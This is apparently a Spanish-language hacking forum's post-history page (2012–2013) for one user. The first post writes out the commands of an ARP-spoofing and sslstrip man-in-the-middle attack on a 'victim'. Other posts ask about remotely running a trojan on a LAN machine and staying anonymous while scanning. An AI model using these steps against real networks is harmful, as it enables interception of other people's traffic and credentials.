elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8
1  Seguridad Informática / Hacking / Bactrack Sslstrip en: 18 Abril 2013, 09:20 am
Hola,
Bunes dias amigos, tengo un problema con el backtrack y el sslstrip, soy incapaz de ejecutarlo, miren les comento lo que me pasa

1) ejecuto este comando echo "1" > /proc/sys/net/ipv4/ip_forward
2) arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}
3)iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
4)python sslstrip.py -l 10000

El problema que surge es que el internet de la victima se me corta es decir le ago un ddos, si utilizo otro puerto como por ejemplo el 8080 el internet de la victima funciona perfectamente pero el sslstrip, no muestra nada, tambien he probado a ejecutar despues el ettercap hacer un sniffing pero nada se corta la conexion de la victima. haber si alguien sabe algo gracias
2  Seguridad Informática / Hacking / Anonimato en Pingo escaneo en: 14 Marzo 2013, 22:54 pm
Hola, no entiendo muy bien el problema que me pasa haber si alguien puede iluminarme, si instalo Tor en mi pc para navegar anonimamente, visito una web y es correcto me proporciona una ip que no es la mia, pero si lanzo  un ping a google.es, si me da mi ip, es decir si realizo un escaneo a un host o algo no seria anonimo, ¿no es así?  ¿esto solo se podria solucionar con una vpn?
3  Seguridad Informática / Seguridad / Re: Hdd con password ayuda en: 3 Febrero 2013, 22:09 pm
si que se puede quitar las password de los discos, necesito que me des un poco mas de información ¿que modelo de disco? .
4  Sistemas Operativos / GNU/Linux / Re: multiarch en: 2 Febrero 2013, 00:38 am
gracias
5  Sistemas Operativos / GNU/Linux / multiarch en: 29 Enero 2013, 01:01 am
Hola, tengo una duda sobre este tema que por mas que busco por google no encuentro la respuesta.¿ Si instalo una version de debian squeeze 6.0.6 de x64 podre resolver las dependencias automaticamente con apt-get install, estaria  implementado el multiarch o tendria que instalar debian wheezy para poder resolverlas automaticamente?

gracias
6  Sistemas Operativos / GNU/Linux / terminal como root en: 15 Enero 2013, 14:12 pm
¿Alguien sabe como se hace para que cuando arranques el terminal se inicie ya con privilegios no tener que poner sudo su  y la contraseña ?

Gracias un saudo.
7  Seguridad Informática / Hacking / ejecutar troyano remotamente en: 29 Diciembre 2012, 21:42 pm
¿Es posible en una lan  subir un troyano a un pc y ejecutarlo remotamente desde otro pc?
8  Programación / Ingeniería Inversa / thomson en: 15 Diciembre 2012, 15:18 pm
Hola buenas, alguein que tenga un poko de tiempo y quiera ayudarme a realizar ingenieria inversa sobre el firm de un router grax
9  Seguridad Informática / Hacking Wireless / Re: Routers Thomson. Caso español: redes WEP/WPA “SpeedTouchXXXXXX” al descubierto en: 8 Diciembre 2012, 17:47 pm
alguien sabe sobre ingenieria inversa de firmwares?
10  Seguridad Informática / Hacking / Re: Binwalk en: 7 Diciembre 2012, 15:41 pm
eso fue lo que hice al final pero lo malo que no es la ultima version
Páginas: [1] 2 3 4 5 6 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines